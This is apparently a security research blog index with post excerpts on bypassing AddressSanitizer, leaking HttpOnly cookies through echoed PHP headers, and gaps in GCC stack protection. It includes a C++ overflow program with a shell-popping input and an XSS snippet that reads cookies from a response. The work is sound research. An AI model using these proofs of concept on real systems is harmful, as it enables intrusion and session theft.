New Whitepaper: Bypassing AddressSanitizer

Abstract

This paper evaluates AddressSanitizer as a next generation memory corruption prevention
framework. It provides demonstrable tests of problems that are fixed, as well as problems that
still exist.

While developing the Watchman buffer overflow framework it became apparent that some
overflow cases were very difficult to solve. If there is an overflow that does not cross heap block
or object boundaries, but still crosses semantic boundaries, it doesn’t write over the canary at
the end of that block. We have run the Watchman test suite against AddressSanitizer and found
that it fails in the same case.

Below are some examples of programs that are not safe even with AddressSanitizer enabled. All
code was compiled with g++ 4.8.0 and AddressSanitizer enabled on Ubuntu 12.04.

Adjacent Buffers in the Same Struct/Class

The following source code demonstrates a vulnerable program:

 


#include
#include
class Test{
public:
Test(){
command[0] = 'l';
command[1] = 's';
command[2] = '\0';
}
void a(){
scanf("%s", buffer);
system(command);
}
private:
char buffer[10];
char command[10];
};
int main(){
Test aTest = Test();
aTest.a();
}

This program can be manipulated into popping a shell with the following input:

user@host:~$ ./test
aaaaaaaaaa/bin/sh;
$

Read more ›

RedditTwitterFacebookGoogle+LinkedInStumbleUponEmail
Posted in Research

Dropping the Cookie Jar

HttpOnly is a great way to stop XSS attacks from stealing sessions. Usually. When you do an audit, make sure you don’t see anything like the “test.php” code below.


<?php
//test.php
setcookie("test", "test", null, "/", null, null, true);  
foreach (getallheaders() as $name => $value) {
    echo "$name: $value\n";
}
?>

If you do, there’s a very simple way to bypass HttpOnly. That’s because you’re leaking cookies from the headers into the HTTP body. The same issue occurs when you print things from “apache_request_headers” in php. I’m sure this happens in other frameworks/languages.

                                                                
<html>                                                          
<head>
    <script>
    //some XSS!
    function cookieJar(){
        alert(xhr.responseText)
    }
    var xhr = new XMLHttpRequest();
    xhr.withCredentials = true;
    xhr.onreadystatechange = cookieJar;
    xhr.open("GET", "/test.php", true);
    xhr.send(null);
    </script>
</head>
</html>

Of course, nobody would do something like that. I’ll just leave this link here:

http://code.ohloh.net/search?s=getallheaders&pp=0&fl=PHP&mp=1&ml=1&me=1&md=1&ff=1&filterChecked=true

RedditTwitterFacebookGoogle+LinkedInStumbleUponEmail
Posted in Research

ModSecurity sample logs

One important mitigation tactic is to use a Web Application Firewall. We prefer ModSecurity (http://www.modsecurity.org/). But what does an attack actually look like? We fired off an attack on our own site to show you.

modsecattack

Read more ›

RedditTwitterFacebookGoogle+LinkedInStumbleUponEmail
Posted in Research

The first rule of making your own authentication system

… is don’t. At Glider Security Inc. we created a Really Bad Authentication System. Don’t use it for anything except demonstrating bad security. This code doesn’t come with a warranty because it should not be used. There are *some* spoilers and fixes along the way.

https://github.com/ewimberley/RollMyOwnAuthentication

Read more ›

RedditTwitterFacebookGoogle+LinkedInStumbleUponEmail
Tagged with: , , , , ,
Posted in Research

Modern Overflow Targets

Memory corruption vulnerabilities have become significantly more difficult on modern operating systems. Stack protections have rendered the original method of buffer overflow exploitation (putting the nop sled and shellcode in the buffer and overwriting the instruction pointer with an address within the buffer) ineffective. Between Address Space Location Randomization (ASLR), and stack cookies it is difficult to actually exploit a remote system using the traditional overflow method without some sort of information leak.

That said, there are still gaping holes in stack input/output that can be exploited. This paper describes some general techniques for overflowing buffers on the stack without tripping __stack_chk_fail at all, or at least not until it’s already too late. Rather than a new technique for redirecting execution flow via the EIP we focus here on a new set of targets. Specifically, we will be discussing previously undocumented weaknesses in the function safety model for GCC 4.6 and below.

GCC ProPolice Documented Exceptions

According to the Pro Police documentation [2] of the function safety model, the following cases are not protected:

  • Structures cannot be reordered, and pointers in the functions are unsafe

  • Pointer variables are unsafe when there are a variable number of arguments

  • Dynamically allocated character arrays are unsafe

  • Functions that call trampoline code are unsafe

We found the following additional cases to be unsafe:

  • Functions where more than one buffer is defined do not reorder correctly, at least one buffer may be corrupted before it is referenced

  • Pointers or primitives in the argument list may be overwritten and then referenced before the canary check occurs

  • Any structure primitive or buffer may be corrupted before it is referenced (this includes stack objects in C++)

  • Pointers to variables in lower stack frames are unsafe because that data may be written over and then referenced. Since we are no longer limited to the current stack frame this includes local variables, pointers (i.e. function pointers) and more buffers.

The IBM documentation on the function safety model is written with the assumption that the attack is a traditional stack overflow exploit. The documentation claims that data after the stack canary is safe after function return, which is true. The problem is that the data is not safe before function return. Pointers into higher addresses of the stack become vulnerable to corruption even if they are in a different stack frame.

Read more ›

RedditTwitterFacebookGoogle+LinkedInStumbleUponEmail
Tagged with: , , , , , ,
Posted in Research